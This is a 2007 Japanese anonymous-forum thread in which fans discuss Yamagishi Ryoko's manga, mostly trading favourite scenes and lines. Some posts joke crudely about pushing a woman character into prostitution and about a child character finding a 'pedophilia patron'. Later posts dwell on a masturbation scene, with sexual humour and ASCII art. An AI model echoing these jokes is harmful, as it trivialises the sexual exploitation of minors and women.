来月号のオチさえ悪くなければ、そこそこ楽しめた作品かも。
この調子だとバッドエンドではなさそう。

275 :花と名無しさん:2007/07/17(火) 00:17:15 ID:???0
>>273
男に転嫁する発想がなんだか260めいているような

276 :花と名無しさん:2007/07/17(火) 00:20:00 ID:???0
ヴィリはなんだかんだ言って礼奈先生は美しいのが良い


277 :花と名無しさん:2007/07/17(火) 00:20:33 ID:???O
>>275
いや260が男が煽りのために使うとか書いてたからさ。
でも256見たら女も書くと書いてたか。

278 :花と名無しさん:2007/07/17(火) 00:21:01 ID:???0
>>274
ヴィクトリアこないだデパ地下行って実物見てきたw

漫画だと一個一個が大きいように描いてあったけど
実物はもっと薄いかんじに見えた


279 :花と名無しさん:2007/07/17(火) 00:21:12 ID:???O
なんかさー何のコンプレックスだか知らないけど、
みんなも相手すんのやめなよ。
否定屋や決めつけ屋は不愉快。
それより山岸凉子について話しましょう。


280 :花と名無しさん:2007/07/17(火) 00:23:40 ID:???0
腐女子認定された260が悔し紛れに、男に矛先を向けたっぽいな。
腐女子が好みそうな板と指摘されたりオタク女という指摘が悔しいので
鸚鵡返しに近い形で仕返し兼言い訳

281 :花と名無しさん:2007/07/17(火) 00:24:47 ID:???O
では山岸凉子の作品で気に入っている台詞、シーンは何?

282 :花と名無しさん:2007/07/17(火) 00:25:46 ID:???0
>>279
しつこいよw

283 :花と名無しさん:2007/07/17(火) 00:26:22 ID:???0
………ずらん、と。お前は私だ?
それは頭に焼きついて離れないシーンか。


284 :花と名無しさん:2007/07/17(火) 00:27:38 ID:???0
馬子様と額田女王の出てくるシーンは大抵好き

285 :花と名無しさん:2007/07/17(火) 00:28:20 ID:???0
おまえはわたしだ

ママ助けてぇ〜・・・

286 :花と名無しさん:2007/07/17(火) 00:28:37 ID:???0
>>281
アラベスクのノンナが家出した時の下宿先でケーキつくる場面

つくったのがえらい立体的?なケーキで
ソビエトじゃこういうケーキ食べるのかと思ってたw

287 :花と名無しさん:2007/07/17(火) 00:31:04 ID:???0
>>273
アニメ板だと日常茶飯事

288 :花と名無しさん:2007/07/17(火) 00:32:15 ID:???0
エーディクの、
「ソビエトは僕を窒息させる」

289 :花と名無しさん:2007/07/17(火) 00:36:36 ID:???0
「青青の時代」のイヨとシビの場面は和むものが多い。
お婆さんが死んで、でもシビが花を飾るよう言っているうちに
心が温かくなってきたというようなのとか。
クチヒコも好きだけどw

>>286
ヴェータとケーキを食べる場面は負いしそうだった。
あれもある意味立体的。

290 :花と名無しさん:2007/07/17(火) 00:37:15 ID:???O
>>281
マイヤのアントルラセ

291 :花と名無しさん:2007/07/17(火) 00:40:13 ID:???0
ヴィリから選ぶなら、眼鏡っ子がオタオタしてる場面全部

292 :花と名無しさん:2007/07/17(火) 00:42:15 ID:???0
白眼子様が、光子の子供時代を楽しそうに回想する場面が好き

293 :花と名無しさん:2007/07/17(火) 00:43:22 ID:???O
倉敷美和ははたして処女だったのだろうか
処女…つまり女の子という意味だが…





コト
のところ

294 :花と名無しさん:2007/07/17(火) 00:55:30 ID:???O
トコロテンで言えば、毛と王子が初めての共同作業です
とばかりに超能力で低気圧を動かして雨を降らせるシーン。

295 :花と名無しさん:2007/07/17(火) 00:57:20 ID:???0
毛人と王子の共同作業、というとよからぬ作業を想像する

296 :花と名無しさん:2007/07/17(火) 00:58:36 ID:???O
六花の見開きグランジュテ。
ヴェータの「バレエを踊れない」のコマ。
あとアーシャ絡みのシーン全部。
王子の「ふゆん」
パニュキスのカラー絵。

台詞は思い当たらなかった。

297 :花と名無しさん:2007/07/17(火) 00:59:40 ID:???0
今なら黒鳥を踊れるっと!のマリアがかっこ綺麗

298 :花と名無しさん:2007/07/17(火) 01:06:41 ID:???0
>>296
私も、好きな場面はいろいろあるけれど、その割に台詞があまり思い浮かばない。

六花の本番のクララの楽しそうな感じ、
六花と千恵子さんの場面全般、
それと千花のいい子ぶりが出ている場面
が好き。

299 :花と名無しさん:2007/07/17(火) 01:07:39 ID:???0
>千花のいい子ぶりが出ている場面

そんなのあったっけ?

300 :花と名無しさん:2007/07/17(火) 01:14:20 ID:???0
千花がワックスで踏み外してから執念のターンを回るところ。
篠原父のカレー。
日出ルの超常的シーン。
持ってないからうろ覚えだけど通過する雷神を捕まえようとする所とか?
これが294の雨降らしだっけ?
人が死ぬ時に死神みたいなのに連れて行かれる所とか。

301 :花と名無しさん:2007/07/17(火) 01:18:18 ID:???0
テレプシで印象的なセリフと言えば

美智子さんの
「頭の上に一本の糸があるのよ!」「それは宇宙にのびている!」
「足の下にもあるのよ」「それは地球のマグマにむかっている」
だな。

シーンは、千花のクララ(興奮して踊ってるところ)
猫の黒ちゃん取り合いして姉妹で楽しく練習してるところ。

302 :花と名無しさん:2007/07/17(火) 01:19:05 ID:???O
今六と千が重なった!

のところは忘れたくても忘れられない。

303 :花と名無しさん:2007/07/17(火) 01:20:11 ID:???0
>>284
あ、私も。
別に馬子マニアってわけじゃないけど、物語の変化の基点となる場合が多いので
付箋つけていたことがあった。
馬子のセリフってリズム感があって好きだ。

304 :花と名無しさん:2007/07/17(火) 01:24:37 ID:???O
台詞も「そなたは泣かぬのですね」
「人は死んでも仏にはなれぬ」「わたしは母上の子だ」

「食えなきゃ死ね!死ね!」「寝るところ……ないの」

など印象的だが、気に入ってるかと言われると……。

305 :花と名無しさん:2007/07/17(火) 01:37:02 ID:???0
「あの難しいリフトが目に浮かぶねぇ・・」
千花の魅力(才能、性格、努力)の全てを一度に思い出させ、それが失われてしまった事もしみじみと感じさせられた。
漫画の中だけでしか使えない台詞じゃない、自分も口にしそうなありふれた言葉、場面なんだけど(人が死んだのがありふれた・・と言う訳ではない)
ぐっときてしまった。

306 :sage:2007/07/17(火) 02:00:31 ID:UFp1M+UJ0
>>303
そんな風に馬子を見ている人がいるんですね。
すごい。面白い。


307 :花と名無しさん:2007/07/17(火) 02:12:11 ID:???0
>>306
メアド入れる所にsageと入れられると皆さんとお揃いになりますよ。
うっかりミスでご存知だったらすみませぬ。


308 :花と名無しさん:2007/07/17(火) 02:33:35 ID:???O
いんだよ

309 :花と名無しさん:2007/07/17(火) 02:48:40 ID:???0
>>307
d


310 :花と名無しさん:2007/07/17(火) 02:50:34 ID:???0
この目ではじめて見る
霊感というものを…
彼女は今踊るということに自分のすべてを捧げているのだ
 (略)
教えるということがどだい不可能な この芸術の世界を 彼女は今つかんだのだ
 (略)
青ざめて透明な
真のロマンチックバレエを!


言わずと知れた名場面だけど、
「アラベスク」では、ギシ先生ここが一番描きたかったシーンなんだなと思った
ここに来るための布石も絵も演出も何もかもすばらしかった

311 :花と名無しさん:2007/07/17(火) 02:52:08 ID:???0
>>288
あのエーディク、首のところの絵の描き方が
ほんとうに搾り出すような気持ちで発した言葉だってことが分かるから、
ぎゅうううって胸がしめつけられる。

312 :花と名無しさん:2007/07/17(火) 08:23:28 ID:???O
>>300
読み直すのです

313 :花と名無しさん:2007/07/17(火) 08:49:37 ID:???0
ミロノフの車から逃げて見ないでって震えてるノンナと
病室でミロノフに見つめられて身を捩ってるノンナって
今まで読んだ漫画のどんな場面よりもエロく感じる。

いろんな意味で今のあけすけなエロの問題点とかってあるけどそれを全部置いておいても
表現とか読み手の想像力とかに対してもすごくもったいないコトしてる気がする。

314 :花と名無しさん:2007/07/17(火) 09:07:54 ID:???0
>>310
そのあと踊りを絶賛されたノンナが、
「うん あたしもそう思うの」
っていうところが好き。

315 :花と名無しさん:2007/07/17(火) 09:29:41 ID:???O
>>314
私もそこ好き。

今テレプシ読み返してるんだけど
テレプシ二巻で役所の人が空美ママと話す場面
「ご主人…ここずーっと病院に通ってませんよね」
「重度のアルコール依存で肝機能も最悪だ
そのため救いの手を差し伸べたのです」
これがあるから死亡フラグなんだろうけど、ミティコお義姉さんは息災かね?
あんだけ伏線あったし、空美ちゃんが二部では重要になりそうなんだけど

316 :花と名無しさん:2007/07/17(火) 10:16:31 ID:???0
空美ちゃんの踊り見たいな〜
でも風俗のすごいとことかで働かせられてたりしそう…


317 :花と名無しさん:2007/07/17(火) 11:11:56 ID:???O
>>316
小学生の頃より……ってことは本番ですか。
転校できないって言ってたから、そのおそれもあるよね。
艶子はなんで、娘より義姉のほうを大事にするんだろ。
ていうか、艶子が風呂に沈めば家族を養えるのでは。

318 :花と名無しさん:2007/07/17(火) 11:24:10 ID:???0
>>317
本人的には「私はブスで年だから」ってなるんだろうけど、
鶯谷あたりに立ってれば需要はあるような。
娘脱がすより、そっちが先だろと言ってやりたい。

319 :花と名無しさん:2007/07/17(火) 12:31:36 ID:???O
同感。
スタイルはいいし、三十代か四十くらいなんでそ?
ガード下に立てば今日からあなたも立派な夜鷹

320 :花と名無しさん:2007/07/17(火) 13:27:46 ID:???0
娘より自分の方がかわいいんじゃ?

321 :花と名無しさん:2007/07/17(火) 13:55:20 ID:???O
夫とミチコに間接的に復讐してるようにしか見えない。

322 :花と名無しさん:2007/07/17(火) 13:59:59 ID:???O
まあ成人女性だったら体売らなくてももっと効率の良い仕事あるしな。

323 :花と名無しさん:2007/07/17(火) 14:27:00 ID:???O
艶子がバレエ一筋の中卒だったらどうすんのよ

324 :花と名無しさん:2007/07/17(火) 14:36:11 ID:???O
そんな経歴くらい偽れるだろ。
ブスでも、痩せてて身体が柔らかいなんてポイント高いぞ。

325 :花と名無しさん:2007/07/17(火) 14:36:46 ID:???0
バレエ団に教師として勤める選択肢はなかったのかな。
生徒からの人気は出なさそうだけど。

326 :花と名無しさん:2007/07/17(火) 14:39:21 ID:???O
美智子が妨害しそう。

327 :花と名無しさん:2007/07/17(火) 14:47:52 ID:???0
艶子パートに出てるんだよね。何やってるんだろ。
家事万能みたいだから家政婦みたいなのがあってると思うんだけどね。
英一があぼんしたらクミと二人で住み込みでもすればいいのに。


328 :花と名無しさん:2007/07/17(火) 14:51:05 ID:???0
艶子、内弟子なんだよね。美智子先生最初は拒絶しただろうな。
内弟子になるんだったら何でも言う事聞くのよとか脅しかけてそう。
で、艶子もカルト入信状態で喜んで奴隷化。

329 :花と名無しさん:2007/07/17(火) 14:54:58 ID:???0
クミちゃん、大人になってお化粧したら、森理世みたいな感じだったりして。

330 :花と名無しさん:2007/07/17(火) 15:01:58 ID:???O
空美ちゃんが劇的に美人バレリーナになったとしてもさ
金がないと、バレエの実力があっても大成できないのでは?
特に日本では。
夢を売る仕事だし。
キナちゃんだって社長の娘だからネズミをもらえた。

331 :花と名無しさん:2007/07/17(火) 15:05:03 ID:???0
いままでけんなおこだったw森理世、ありだ

332 :花と名無しさん:2007/07/17(火) 15:06:15 ID:???O
ペドフェリアのパトロンを捕まえるとか。

333 :花と名無しさん:2007/07/17(火) 15:08:38 ID:???0
>>316
そして、キャバレーのおばちゃんの指導で踊ってたりしたら、嫌だな。

334 :花と名無しさん:2007/07/17(火) 15:09:32 ID:???O
そこでITですよ

335 :花と名無しさん:2007/07/17(火) 15:10:00 ID:???0
あの時代に艶子がバレエをやっていたのなら元々は裕福な育ちだよね
悪い意味のバレエ馬鹿になって勘当でもされたのかなと思ってる
英一あぼんで保険金とも思ったけど艶子親あぼんでも遺産が入るかも

336 :花と名無しさん:2007/07/17(火) 15:13:36 ID:???O
艶親なんてとっくに死んでそう。
遺産はA一と美智子が全部使った。

337 :花と名無しさん:2007/07/17(火) 15:17:06 ID:???O
年金すら払ってなさそうなのに、保険に入ってるわけがないと思う。
艶子は美智子好きだから英一と結婚しただけっぽい。
英一が死ぬと美智子とのつながりが切れるけど、艶子的にはどうなんだろ?

338 :花と名無しさん:2007/07/17(火) 15:20:13 ID:???0
>>337一応クミがいる<繋がり

339 :花と名無しさん:2007/07/17(火) 15:22:40 ID:???0
空美ちゃんのクララが見てみたかったw

340 :花と名無しさん:2007/07/17(火) 15:27:05 ID:???O
すごい!クララが仮面被って踊ってる!

341 :花と名無しさん:2007/07/17(火) 15:33:05 ID:???0
クミ、足がでかいからもうクララの身長じゃないかも

342 :花と名無しさん:2007/07/17(火) 15:34:23 ID:???0
>>339コンクールの時、美智子センセがクララは美少女と決まってるからダメとか言ってたな

343 :花と名無しさん:2007/07/17(火) 15:38:29 ID:???O
パートなんて無理〜
http://zaraba.qp.land.to/up/src/1184370517549.jpg

344 :花と名無しさん:2007/07/17(火) 15:40:37 ID:???0
>>343
礼子さんは何を思って出演したんだろう
つか仕込みか

345 :花と名無しさん:2007/07/17(火) 15:56:19 ID:???O
>>341
その伏線もあったね。
六花より足が大きい。
でも、成長期があとになるほど伸びがいいんじゃ?

346 :花と名無しさん:2007/07/17(火) 16:04:32 ID:???O
そういうのって伏線とは言わないのじゃないか?

347 :花と名無しさん:2007/07/17(火) 16:24:18 ID:???O
ごめんごめん
暗示って言っとくよ。
空美ちゃんが六年で足がデカかったのはガチ

348 :花と名無しさん:2007/07/17(火) 16:29:57 ID:???0
中学のとき、転校してきた女の子の母親が再婚、
義父が性犯罪で全国ネット、彼女は母と夜逃げ。

高校のとき、彼女の夜逃げ先で編入した中学の元同級生に会った。
中卒で、住み込みで就職したらしい。

クミちゃんもせめて中学は行ってますように。



349 :花と名無しさん:2007/07/17(火) 18:22:50 ID:???0
大人になったらクミちゃんは森理世、六花は知花くららなイメージ。
顔の系統は合っているかと。

350 :花と名無しさん:2007/07/17(火) 18:56:26 ID:???O
>>335
私の妄想では、艶子さんは美智子先生の屋敷?の住み込み家政婦の子供で、
幼い美智子をずっと憧れの目で見て、隠れて真似して踊ってた。
で、壊れて留学先から戻った美智子が、気晴らし感覚で艶子への指導を開始。
最初は「お笑いだわお笑いだわ…」状態がしばらく続くも、めげない艶子にいつしか真剣に指導を始める美智子先生。
そんで、憧れのお嬢様に一生の忠誠を誓う艶子のできあがり。
てことになってるー

351 :花と名無しさん:2007/07/17(火) 19:17:13 ID:???0
>350
上原きみ子の絵で想像してみました。

352 :花と名無しさん:2007/07/17(火) 19:20:09 ID:???0
>>287
特撮板でもw

353 :花と名無しさん:2007/07/17(火) 19:29:32 ID:???O
特板の特ヲタと腐れの確執は異常

354 :花と名無しさん:2007/07/17(火) 19:43:38 ID:???0
>>350
いいね、その設定。

355 :花と名無しさん:2007/07/17(火) 20:00:43 ID:???0
>>351
いや「ガラスの城」時代のわたなべまさこでw

356 :花と名無しさん:2007/07/17(火) 20:02:04 ID:???O
>>354
うん あたしもそう思うの。
つか、お笑いだわ、て言われなくて良かった(^人^)
>>313
亀レスだけど前者の方はエロいというか、ミロノフ先生にとんだ羞恥プレイを受けるノンナ、という感じで
こちらまで、何だかぎゃあ恥ずかしい(><;)という気持ちでいっぱいになる…

357 :花と名無しさん:2007/07/17(火) 20:04:37 ID:???0
お笑いだろ

358 :sage:2007/07/17(火) 20:15:01 ID:???0
お笑いでなくてなんだというのか。

359 :花と名無しさん:2007/07/17(火) 20:16:08 ID:???O
>>350
ガラ亀の中盤の美内の絵で想像しました

360 :花と名無しさん:2007/07/17(火) 20:23:01 ID:???O
じゃあ私は花咲アキラの死んだ絵で

361 :花と名無しさん:2007/07/17(火) 20:32:02 ID:???0
じゃあ私は猫村さんの絵で

362 :花と名無しさん:2007/07/17(火) 20:55:39 ID:???0
じゃあ私は山川純一の絵で

363 :花と名無しさん:2007/07/17(火) 21:01:04 ID:???0
ちょwwww

オマイラ愛してるw

364 :花と名無しさん:2007/07/17(火) 23:32:20 ID:???0
やっと見れた・・

名シーンと思うのは、王子と毛人が崖から落っこちた後、
仏の列を王子が眺めてるとこです
あそこの台詞も絵も効果音も全部好き

365 :花と名無しさん:2007/07/17(火) 23:42:44 ID:???O
私のお気に入りは、保食神が酒を醸すシーン

366 :花と名無しさん:2007/07/17(火) 23:52:29 ID:???0
効果音?

367 :花と名無しさん:2007/07/18(水) 00:01:38 ID:???0
音の出る漫画を描くなんて、ギシ先生は天才にも程があるな。

368 :花と名無しさん:2007/07/18(水) 00:16:36 ID:???0
毛がフッツーのところに行った後の「あんな女のどこが!」のところと
コブラオナニーはいつ見ても笑ってしまうw
悲しいんだけど、どこか滑稽でそれがまた可哀想で忘れられない。

369 :花と名無しさん:2007/07/18(水) 00:34:25 ID:???0
この世のものではない感じが良く出ていた効果音だったよね

370 :花と名無しさん:2007/07/18(水) 00:40:08 ID:???0
ほんと画期的な漫画だ

371 :花と名無しさん:2007/07/18(水) 00:47:59 ID:???0
>>365
そこ最悪

372 :花と名無しさん:2007/07/18(水) 01:12:53 ID:???0
最悪と思ったのなら作者の思惑通りじゃなかろかそのシーンは

373 :花と名無しさん:2007/07/18(水) 01:21:14 ID:???0
>>368
私も、このスレ見てから 
そこが笑ってしまうコマになってしまったよww
だってここの人たち、「コブラオナヌ」とか言うからwww

374 :花と名無しさん:2007/07/18(水) 01:23:13 ID:???0
あそこでバックにコブラを持ってくるなんて、ギシ先生天才www


375 :花と名無しさん:2007/07/18(水) 01:46:54 ID:t1++62i+0
生生しいなぁ

376 :花と名無しさん:2007/07/18(水) 03:58:46 ID:???O
コブラの代わりに、何の動物だったらさわやかになるんだろ。
と考えたんだけどさ
あそこにコアラやハムスターやチワワの絵があっても、やっぱりおどろおどろしいと思う。

377 :花と名無しさん:2007/07/18(水) 04:47:13 ID:???0
つーかさ、せめて当時の日本にいる動物か
夢殿なんだから仏教に関係ある動物にしようよw

378 :花と名無しさん:2007/07/18(水) 05:22:16 ID:???O
当時日本にいた動物……
サメ、たぬき、亀、それに赤カブトもいますね。
サメオナニーやたぬきオナニーも斬新かと思います。

379 :花と名無しさん:2007/07/18(水) 06:11:21 ID:???0
ttp://enjoi.blogdns.net/up/src/572.jpg
wktkが止まりません

380 :花と名無しさん:2007/07/18(水) 09:42:20 ID:???0
「コブラオナヌー」って言われてるけど、コブラは厳密には
オナヌー終了後の憎悪の表現だよね?

381 :花と名無しさん:2007/07/18(水) 10:27:25 ID:???0
>>350
艶子さんを美智子さんがバレエ団内で取り立ててやった、
という話が出ているから、艶子さんが美智子さんの弟子になったのは、
美智子さんがバレエ団にいた時=海外渡航前だったのだと思う。

382 :花と名無しさん:2007/07/18(水) 10:35:52 ID:???O
オナーヌ付きコブラの解釈に侃々諤々

383 :花と名無しさん:2007/07/18(水) 12:12:32 ID:???0
>>380
いんだよ

384 :花と名無しさん:2007/07/18(水) 12:24:34 ID:???O
>>383
千花ちゃん乙

385 :花と名無しさん:2007/07/18(水) 15:18:35 ID:???0
コブラの前にあるセリフ

「い 今この手に?んだと思った光が」

  「射干玉の 闇に変わる」

コレなぜか印象深いんだ。。ぬばたまのやみとか言葉が美しい
淡水いぢわるだね、王子カワイソス
「王子、もう一度床下へお隠れを」ってエミシが言った時とかしっかり見てたもんね
淡水嫉妬深いんだろうか?王子を幸せにさせたくはないのか
彼が余計な事言わなきゃコブラしなくてすんだのになw

386 :花と名無しさん:2007/07/18(水) 15:43:32 ID:???0
>>380
コブラのときてまだいってないんじゃないの?
だってその後のページの「この手でこの指で あの女の息の根を」
ってところで乳首いじって感じてるし。
確かに「わたしと毛人は過去生において未来世において」のコマで
いったとも見えるけど。その後の暗転とかw

387 :花と名無しさん:2007/07/18(水) 16:14:58 ID:???0
そ、そこまで考えてなかった…

388 :花と名無しさん:2007/07/18(水) 16:19:33 ID:???0
暗転ワロタ

389 :花と名無しさん:2007/07/18(水) 16:26:06 ID:???0
>>386
じゃ、2回目なのか?!コブラが鎌首をもたげてるのはそういう意味も?
一回目は悲しみと苦しみの中で
二回目は憎しみMAXとなりフツ殺しを決意して…
怖いけど凄い表現かもしれないな

390 :花と名無しさん:2007/07/18(水) 16:35:22 ID:???0
二回戦か。その発想は無かったわw

391 :花と名無しさん:2007/07/18(水) 17:01:58 ID:???O
みなさん、ぬばたまは文庫六巻の169ページ
コブラは173ページですよ!
172ページの「!」がクライマックスだと思ってたんだけど。

392 :花と名無しさん:2007/07/18(水) 17:05:15 ID:???O
まさかそんなに早くクライマックスが来ると言うのか…

393 :花と名無しさん:2007/07/18(水) 17:09:10 ID:???0
「!」は次のせりふの内容に気づいたからだと。まだ途中だろ

394 :花と名無しさん:2007/07/18(水) 17:22:20 ID:???0
「わたしとケミシをつなぐ蘇我の血と同じく」
「あの女も物部の血でケミシを引き寄せるというのだろうか!」
絶対ケミシこんなに大げさに考えてないって。(ただ顔が気に入っただけ)

コブラの二つ前のコマでいったっぽい。
ずっと夢殿に入っているから、何回も自家発電してるかもね…



395 :花と名無しさん:2007/07/18(水) 17:35:22 ID:???0
じゃあ中は相当匂いがこもってそうな…
と思ったがトジコが入った時はなんかいい香りがしたんだっけ。

396 :花と名無しさん:2007/07/18(水) 17:39:20 ID:???O
>>394
暗転説かw
じゃああの乳首弄りは?

397 :花と名無しさん:2007/07/18(水) 17:40:33 ID:???O
>>395
良い香り=栗の花の香り

398 :花と名無しさん:2007/07/18(水) 17:46:25 ID:???0
>>396
いやだから余韻を楽しむ(?)っつうか二回戦以降ですよ。

個人的に、栗の花ってそんなにヘンな香りじゃないと思うんだよね。
鼻が悪いんであんまり匂わないっていうのもありますが。

399 :花と名無しさん:2007/07/18(水) 17:47:33 ID:???0
うん、普通に考えればパアーっと光が差したところが絶頂だろうね
そのあと脱力してグッタリ>暗転
しばらくしてフツへの憎しみがフツフツと沸き上ってきて
彼女を亡きものにしようと決意
その後2回目があったかどうかはあの絵だけじゃわからんが
ひょっとして一晩中?…w

は冗談にしても
泣きながらグッドアイディア!とばかりに薄笑いを浮かべて
自分の手で憎い女の息の根を止めてしまおうと決意する王子は
美しくも怖すぎる…
でも自分は王子の気持ち、ちょっとはわかるぞ
普通は思っても実行はしないだろうけどね。

400 :花と名無しさん:2007/07/18(水) 17:56:36 ID:???O
>>398
そうかあの時の王子の顔は本当に気持ちよさそうで
いかにもいった顔してるもんねw
そのすぐ後の暗転も果てた感じでリアルw

個人的にはコブラの鎌首をもたげたシーンから二回戦目突入というのも指示したい。

どっちにしろ着衣のままというのはそこはなとなくエロい

401 :花と名無しさん:2007/07/18(水) 18:02:16 ID:???0
この世の誰よりも

パン屋のペッペが憎い!


……ニジンスキーにもこんくらいの根性があったら良かったのに。

402 :花と名無しさん:2007/07/18(水) 18:39:38 ID:???0
>>401
ディアギレフのことそんなに愛してなかったと思う…

403 :花と名無しさん:2007/07/18(水) 19:02:57 ID:???0
 、        ヽ
 |ヽ ト、  ト、 ト、 、.`、
/|l. l. | |l l | | l |l.| |l. l
/' j/ ノ|ル'/レ〃j/l |
-‐7" ヾー---┐|_.j
 ̄   ./゙ニ,ニF、'' l _ヽ
::   ,.,. |ヽ 」9L.` K }.|
    l'  """  l ) /
  h、,.ヘ.      レ'/
          レ′
 r.二二.)     /  
  ≡≡    ,イ
.       / !
\   /  ├、
::::::` ̄´   /  !ハ.
>>373-400

404 :花と名無しさん:2007/07/18(水) 19:03:11 ID:???0
コブラオナニーでこんなに盛り上がれるスレ住人がかっこよすぎ

405 :花と名無しさん:2007/07/18(水) 19:13:07 ID:???0
コブラオナヌーという凄いネーミングにワロタwwww

読んでいた当時はそんなこと考えもせずに、王子がやたら
気持良さそうだな。ケミシの事がそんなに?と暢気に読んでいた…

406 :花と名無しさん:2007/07/18(水) 19:28:58 ID:???O
コブラオナニーのAA誰か作ってくれないかな

407 :花と名無しさん:2007/07/18(水) 19:33:07 ID:???O
>>395
ティッシュもない時代、タンパク質たっぷりの汁をどこで処理したんだろうな。
よい匂いがこもってたのもすげぇ。
超能力でバラの香りのを放出していたのかも。
わたくしに出来ないことはないのです。

408 :花と名無しさん:2007/07/18(水) 19:42:13 ID:???0
カラダは♂でもハートは乙女だからね

コブラの後は池で行水してせっせとお部屋の香りを焚いて
調子麻呂にお花を持ってきてもらって
さて、暗殺暗殺(はあと

409 :花と名無しさん:2007/07/18(水) 19:42:30 ID:???0
   。シャー
  ∫
_ト ̄|○

ヤターコブラオナニーのAAできたよー

410 :花と名無しさん:2007/07/18(水) 19:54:11 ID:???O
>>407
水が高きから低きに流れるように!
みんな誰しも出きる事なのだ。ウワーン


しかしティッシュもない時代。ふんどしに中田氏したのだろうか?
あれってすぐ洗わないと染みになるんだよね……
王子が自分で処理するとは思えないし、調子麿が片づけてたのだろうか。

411 :花と名無しさん:2007/07/18(水) 19:56:26 ID:???0
マジレスすっと布巾とか雑巾とかじゃね?

412 :花と名無しさん:2007/07/18(水) 20:04:08 ID:???0
そこは超能力で異次元に放出

413 :花と名無しさん:2007/07/18(水) 20:18:31 ID:???0
しかしあの時代にここまで描いたギシ先生を改めて尊敬

414 :花と名無しさん:2007/07/18(水) 20:42:51 ID:???0
すごいよね

415 :花と名無しさん:2007/07/18(水) 20:45:37 ID:???P
私たちにはギシがいる!

416 :花と名無しさん:2007/07/18(水) 20:46:46 ID:???O
しかも汚くなく、イメージ的で
人間が背負ってるものとして
当たり前に描く表現力がすごい

417 :花と名無しさん:2007/07/18(水) 20:52:58 ID:???O
男の子ですから。

418 :花と名無しさん:2007/07/18(水) 21:01:02 ID:???0
女の業ではなくて、男の業をあの時代あそこまで描いた
ギシ先生はやっぱり凄いと思う。

419 :花と名無しさん:2007/07/18(水) 21:20:41 ID:???0
私はネット見るまであれがオナヌシーンだと気付かなかったよorz
子供の頃は毛人が好きなんだから、王子は実は女性なんだと
信じて疑わなかった。色々と脳内で読み飛ばしていたんだろう。

420 :花と名無しさん:2007/07/18(水) 21:21:17 ID:???O
あの時代、男のオナニーを描いた漫画は、
これの他には東京大学物語しか知らない。

421 :花と名無しさん:2007/07/18(水) 21:22:23 ID:???O
>>418
男の業っていうかホモの業だなw

422 :花と名無しさん:2007/07/18(水) 21:22:30 ID:???0
>>418
自分は逆に、布都姫への感情ややり口
そうまでしても愛する人から愛してもらえなかったのは
女の業に則ったのかなーと思った。
体は男でも中身は本人が最も忌み嫌う型の女そのものだし。

423 :花と名無しさん:2007/07/18(水) 21:44:26 ID:???0
王子って女嫌いなのに
女装はよくしてたよなーw

あれは今にして思えば少女漫画としての演出だったんだろうが
子供心に大変不思議だった


424 :花と名無しさん:2007/07/18(水) 21:44:27 ID:???O
うん、女ですね。
でも女でそのままやるとたいていの読者(女性)は
ゲーッて目を背けちゃうもんね。

425 :花と名無しさん:2007/07/18(水) 22:07:45 ID:???O
ホモの、心は女で男が好き、女はライバルで嫌い
だけど体は男で立つものは立つっていう複雑な心境がよく出来てるよね。

426 :花と名無しさん:2007/07/18(水) 22:17:46 ID:???0
>>424
おお、そうかもしれんな、女であそこまでやるとついていけなかったかもしれない
しかしもう王子クラスともなると
男とか女とか関係ない域にまできてるかも

恋情とか憎しみが募ると人間は狂気に走ってしまうことがある
王子もはじめは
「わたしはどうかしている」「これはばかげたことだ」と自覚してたし
「こんな感情は押し殺してしまえ」って自制しようとしてたけど、
 もう収まりがつかなくなってしまったんだな〜
普通の恋愛感情のみならず 
王子にとって毛人はなくてはならない自分の一部に近いような存在だったようだし

427 :花と名無しさん:2007/07/18(水) 22:21:54 ID:???O
もう男とか女とか超えて、他者を求めざるを得ない人間の業だと思う。

428 :花と名無しさん:2007/07/18(水) 22:32:32 ID:???O
>>409
お前やる気あんのかw
オージの向きが逆だから
ト じゃなく ┤を使えば?

429 :花と名無しさん:2007/07/18(水) 22:35:33 ID:???O
>>426
そうですな。二人でひとつだああとか言い張ってたな。
ほんとに気が合うと(気が合うってのも軽い言い方だけど)
考えてることわかったりシンクロしたり
王子達レベルじゃ全然ないけどあるしなあ
何でもできるのに失恋なんて誰にでも起こる普通の悲しみに
あれほど苦しめられるなんてまったくこの世の妙だ。カワイソス

430 :花と名無しさん:2007/07/18(水) 22:36:17 ID:???0
>>409
コブラは2匹で頼む

431 :花と名無しさん:2007/07/18(水) 22:37:09 ID:???0
王子が女だってことはハトシェプストが、なんだっけ、おつきのオカッパの男に岡惚れしてて
浮気に目くじらたてまくったり、追いかけまわして嫌がられるような話になるということか。
 格好悪すぎる。



432 :花と名無しさん:2007/07/18(水) 22:47:45 ID:???0
あともう少しだったんだもんな、地下室でうまくいって。
もう少しで手に入りそうだった光がぬばたまの闇に…
「毛人、今日は豊原に帰るのか?」って聞いてた王子かわゆかった
きっと「もう一番泊まってゆけ♪」とか言って今夜は毛といちゃいちゃしようと思ってたはず…
それが淡水の一言で…
(毛人、行くな)って心でお願いしてたのに…ホントカワイソス
コブラになっても仕方ないだろうな、あの場合。

433 :花と名無しさん:2007/07/18(水) 22:48:44 ID:???0
あれほどの能力と美貌の持ち主が
あんな哀れな姿でなりふり構わず愛を請うってのは
読んでる側も本気で辛かったなー

漫画読んでて泣いたり笑ったりはするけど
あんなにつらい思いをしたことは後にも先にもないかも


434 :花と名無しさん:2007/07/18(水) 23:10:32 ID:???O
>>409
シャーww

435 :花と名無しさん:2007/07/18(水) 23:11:43 ID:???0
>>433
相手の女に何の落ち度もないって所もつらいよね、
嫌な性格であるとか
毛を利用しているとか
そういう所があればまだ救われるんだが
非のうちどころのない女性であるうえ、二人は純粋な相思相愛、
どう見ても勝ち目のない王子。

だけどプライドも何もかも捨てて必死に毛を追い求める王子って
どこか人間くさくて惹かれてしまうんだよね
本当に愛しているなら毛の幸せを祈ろうっていう優等生ではなく。。
人間の愚かさを嫌というほど見せつけてくれたよ
やってることは最低かもしれない
だけどやっぱり王子が好きだ!



436 :花と名無しさん:2007/07/18(水) 23:22:28 ID:???0
>>428
┤は全角だから隙間が大きすぎる

>>430
ほれ

  シャー
  。 。シャー
  ∫∫
_ト ̄|○

437 :花と名無しさん:2007/07/18(水) 23:34:01 ID:???0
>>436
www2匹のコブラはカワイイけどさー
王子のポーズもうちょっと色っぽくできないか〜?w

438 :花と名無しさん:2007/07/18(水) 23:42:41 ID:???O
>>436 なんか優しいパパって感じでイイ!

439 :花と名無しさん:2007/07/18(水) 23:51:10 ID:???O
>>429
ノンケに恋したホモの辛いところだね…。

阿部さんくらい構わず食っちまう性格だったらまだ楽しい人生だったかもしれないが…

